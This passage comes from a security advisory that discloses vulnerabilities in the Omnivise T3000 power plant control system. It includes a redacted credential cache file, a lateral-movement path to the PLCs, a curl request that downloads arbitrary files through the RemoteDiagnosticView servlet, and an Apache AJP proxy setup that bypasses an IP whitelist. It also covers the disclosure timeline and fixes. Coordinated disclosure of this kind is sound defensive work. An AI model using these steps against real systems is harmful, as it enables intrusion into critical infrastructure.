"XXX.XXX.XXX.XXX","crsppswd": "","crsprepo": "AVPatterns","crspservice": "SFTP","crspuser": "siem_t3000_west","primary_ts": true}[...]"parameters": {[...]"snmpv3_authpass": "[redacted]","snmpv3_privpass": "[redacted]","snmpv3_user": "snmpuser","snmpv3_hash": "SHA","snmpv3_encrypt": "AES"}[...]"parameters": {[...]"cyg_server_passwd": "[redacted]",[...]"fst_appsrv_passwd": "","fst_appsrv_red_hgw_ip": "XXX.XXX.XXX.XXX",[...]"icmauser_passwd": "[redacted]",[...]"opcadmin_passwd": "[redacted]","operator01_passwd": "[redacted]","operator02_passwd": "[redacted]","operator03_passwd": "[redacted]","operator04_passwd": "[redacted]","operator05_passwd": "[redacted]","operator06_passwd": "[redacted]","operator07_passwd": "[redacted]","operator08_passwd": "[redacted]","operator09_passwd": "[redacted]","operator10_passwd": "[redacted]","operators_password": "[redacted]","pdm01_passwd": "[redacted]","pdm02_passwd": "[redacted]","pdm03_passwd": "[redacted]","pdm04_passwd": "[redacted]","pdm05_passwd": "[redacted]","pdm06_passwd": "[redacted]","pdm07_passwd": "[redacted]","pdm08_passwd": "[redacted]","pdm09_passwd": "[redacted]","pdm10_passwd": "[redacted]","pmas_passwd": "[redacted]","pmsvc_passwd": "[redacted]","pmts_passwd": "[redacted]","reparchive_passwd": "[redacted]",[...]"t3kservice_passwd": "[redacted]","[...]"tomcatadmin_passwd": "[redacted]","tsuser01_passwd": "[redacted]","tsuser02_passwd": "[redacted]","tsuser03_passwd": "[redacted]","tsuser04_passwd": "[redacted]","tsuser05_passwd": "[redacted]","tsuser06_passwd": "[redacted]","tsuser07_passwd": "[redacted]","tsuser08_passwd": "[redacted]","tsuser09_passwd": "[redacted]","tsuser10_passwd": "[redacted]","txpdomain_passwd": "[redacted]",[...]"vm_r8_passwd": "[redacted]",[...]"vm_tc_passwd": "[redacted]",[...]"vm_ts_passwd": "[redacted]",[...]"vm_whitelist_hostname": "","vm_whitelist_passwd": "","wbuser01_passwd": "[redacted]","wbuser02_passwd": "[redacted]","wbuser03_passwd": "[redacted]","wbuser04_passwd": "[redacted]","wbuser05_passwd": "[redacted]","wbuser06_passwd": "[redacted]","wbuser07_passwd": "[redacted]","wbuser08_passwd": "[redacted]","wbuser09_passwd": "[redacted]","wbuser10_passwd": "[redacted]","wra01_passwd": "[redacted]",[...]"dsrm_passwd": "[redacted]",[...]"dc_passwd": "[redacted]",[...]"patchsvc_passwd": "[redacted]",}--------------------------------------------------To understand the impact of this file, we have to explain a little about the T3000 system.The system is split into three levels: Operator, Automation and Process.Operator Level: This is the level, where thin clients are situated. In our testcase,this level consisted of the Terminal Server that engineers could connect to. From here,they start the T3000 application, which simply loads a browser and displays a Javaapplication served from the Application Server.Automation Level: This level consists of application and automation servers. The applicationserver hosts the not time critical components of power generations such as the web server.The automation servers are taking care of time critical operations. In our testcase thesewere PLCs from the SIMATIC S7-CPU family.Process Level: This level consists of the I/O modules that are controlled by the automationservers.The Terminal Server, located on the operator level already contained the Puppet cache file,which contained all the local Windows users used in the T3000 system in clear text. As theTerminal Server communicates with the Application Server, they have to be connected via network.Thus, the attacker can use the credentials on the Terminal Server to jump to the ApplicationServer. This server is in the same segment as the physical PLC CPUs. Thus an attacker can nowalso control the PLCs and thus the whole power plant.In order to read the Puppet cache file, an attacker has to gain local admin rights first.For this, vulnerability 1 can be used.3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)The RemoteDiagnosticView website is hosted at the following URL:http:// <IP Application Server>:8080/RemoteDiagnosticViewIn our testcase it was configured using default credentials with the following username andan easy to guess password:txpadmin:[redacted]Using these credentials an attacker gains an authenticated session. From there, one cansimply download arbitrary files:------------------------Curl -H "Cookie: JSESSIONID=31B4F2F1BAFC473AB41B65DDF2FD10BA;" -I -H "Content-Type:application/x-www-form-urlencoded" -X POST -d "filename=D:\sectest.txt&type=TEXT"http://$host:8080/RemoteDiagnosticView/DataServletHTTP/1.1 200Content-Type: text/plainTransfer-Encoding: chunked[...]Sectest---------------------------------4) IP Whitelist Bypass (CVE-2024-38879)The AJP protocol can be used to proxy requests from an Apache server to an applicationrunning on Tomcat. By setting up a local Apache server and configuring it to use theAJP service of the Application Server, the IP filter is circumvented.The following setup was built:------------------------------sudo apt-get install libapache2-mod-jksudo vim /etc/apache2/apache2.conf# append the following line to the config   Include ajp.confsudo vim /etc/apache2/ajp.conf# create the following file    ProxyRequests Off    <Proxy *>       Order deny,allow       Deny from all       Allow from localhost    </Proxy>    ProxyPass   / ajp://<Application Server IP>:8009/   ProxyPassReverse   / ajp://<Application Server IP>:8009/sudo a2enmod proxy_httpsudo a2enmod proxy_ajpsudo systemctl restart apache2--------------------------Afterwards, the e.g. RemoteDiagnosticView can be loaded from http://127.0.0.1/RemoteDiagnosticViewVulnerable / tested versions:-----------------------------The following version has been tested which was the latest version availableat the time of the test:* 8.2According to the vendor (T3000 SE Controls Security Announcement 2024/01 Update 1),the following versions and components are affected:All T3000 Versions >= Release 8.2 SP3:* Security Server* Thin Clients* Terminal Server* Application Server* Domain Controller* PDM VM* Whitelisting VM* NIDSVendor contact timeline:------------------------2024-06-05: Contacting vendor through productcert@siemens.com2024-06-06: Siemens assigned S-PCERT#408502024-06-12: Reaching out to specific contacts at Siemens Energy Cybersecurity.2024-06-13: They confirm that ProductCERT will get back to us once they have a timeline.2024-06-19: Customer informs us about a Siemens Energy Document that recommends to            change passwords after installation. The document is called "SE Controls            Security Announcement 2024/01" but only available to T3000 customers.2024-06-20: Sending feedback about the document to Siemens Energy Cybersecurity            as in our opinion it does not solve the issues.2024-06-20: They confirm again that ProductCERT is taking care of issues. Asks            to confirm that we received their messages, which we didn't -> Realized            that one of our email addresses was dropped during the communication,            recovered emails from second account.2024-06-17/2024-06-24: ProductCERT informs:            Vulnerability 1 cannot be reproduced in the reference installation.                 The product team is working to find potentially affected installation                 scenarios.            Vulnerability 2 was reproduced and the product team is working on a mitigation.                 Also, a related customer information has been distributed to customers.            Vulnerability 3 will be fixed in the next release of the T3000 distribution            Vulnerability 4 is already fixed in the current version. The product team is                 investigating, if this vulnerability is present in still supported versions.2024-06-21: ProductCERT informs us that they are able to reproduce all of the vulnerabilities            and provide fixes for most of them. Advisory draft should be shared with            SEC Consult next week. Ask to keep communication directed at ProductCERT            instead of Cybersecurity team.2024-06-28: ProductCERT sends over advisory draft. Could reproduce all vulnerabilities            and requested CVEs.2024-07-03: Siemens ProductCERT requests if we received the draft, as SEC Consult didn't answer yet.2024-07-03: SEC Consult confirms the reception of the advisory draft.2024-07-04: Submitted feedback for advisory draft to ProductCERT. From SEC Consult's            understanding, changing passwords after initial installation only fixes the            cleartext passwords in log files. The puppet issue would not be fixed.            Thus SEC Consult proposed to split Vulnerability 2 into two separate findings.2024-07-05: ProductCERT forwarded feedback to product team.2024-08-02: ProductCERT publishes SSA-857368.2024-08-05: Informing ProductCERT of vacation/absences, will coordinate further afterwards.2024-10-03: Proposing a meeting with ProductCERT to clarify and discuss all open issues.2024-10-22: Meeting with ProductCERT.2024-10-24: ProductCERT sends us further documents for T3000 regarding fixes/mitigations.2024-10-31: Sending advisory draft to ProductCERT, proposing advisory release date for 7th            November.2024-11-06: Receiving feedback from ProductCERT, postponing release to 12th November.2024-11-12: Coordinated release of advisory.Solution:---------Change the passwords to all components. Detailed instructions and patch informationcan be found when following Omnivise T3000 Technical News 2024-089 and SE ControlsSecurity Announcement 2024-01.Release 9.2 Fix / Mitigations:Issue 1 (CVE-2024-38876)* System Software Patch 22.173.20* System Software Patch 22.173.52* Application Software Patch 09.0.19.06Issue 2 (CVE-2024-38877)* System Software Patches 22.173.52* Application Software Patch 09.0.19.06* Technical News 2024-089Issue 3 (CVE-2024-38878)* Application Software Patch 09.0.19.06Issue 4 (CVE-2024-38879)* Application Software Patch 09.0.19.06Release 8.2 SP4 Fix / Mitigations:Patches are currently under development.Release 8.2 SP3 Fix / Mitigations:Currently no fixes are planned, but see Technical News 2024-089 for issue 2 (CVE-2024-38877)Workaround:-----------Limit access to the terminal servers.CVE-2024-38877: If the passwords are suspected to be compromised, change the passwordsfor all computers and service accounts. In addition follow the instructions fromOmnivise T3000 Technical News 2024-089, which is available through T3000 customerservice and applies to releases 8.2 SP3/SP4 and 9.2.Advisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF Steffen Robertz, Andreas Kolbeck/ @2024

Tag

#ios